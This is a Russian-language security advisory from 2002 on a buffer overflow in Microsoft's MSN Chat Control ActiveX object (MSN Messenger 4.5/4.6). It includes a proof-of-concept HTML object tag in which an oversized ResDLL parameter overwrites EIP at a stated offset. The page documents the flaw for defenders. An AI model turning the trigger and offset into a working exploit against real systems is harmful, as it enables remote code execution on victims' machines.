Security Lab

Выполнение произвольного кода в Microsoft MSN Messenger

Дата публикации:13.05.2002
Всего просмотров:1173
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Microsoft MSN Chat Control - ActiveX объект, обеспечивающий функциональные возможности чата. Объект поставляется по умолчанию со многими продуктами Microsoft, включая последние версии MSN Messenger.

Microsoft MSN Chat Control уязвим к переполнению буфера и выполнению произвольного кода. Эта уязвимость может эксплуатироваться при просмотре Web страницы или HTML электронного сообщения.

Пример:

object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"
height="523">
<param name="_cx" value="12039">
<param name="_cy" value="13838">
<param name="BackColor" value="50331647">
<param name="ForeColor" value="43594547">
<param name="RedirectURL" value="">
<param name="ResDLL" value="AAAAAAA[27,257 bytes is where the EIP starts]">
</object>

Уязвимость обнаружена в Microsoft MSN Chat Control (Microsoft MSN Messenger 4.5 and 4.6)
 

Ссылки: ADVISORY: MSN Messenger OCX Buffer Overflow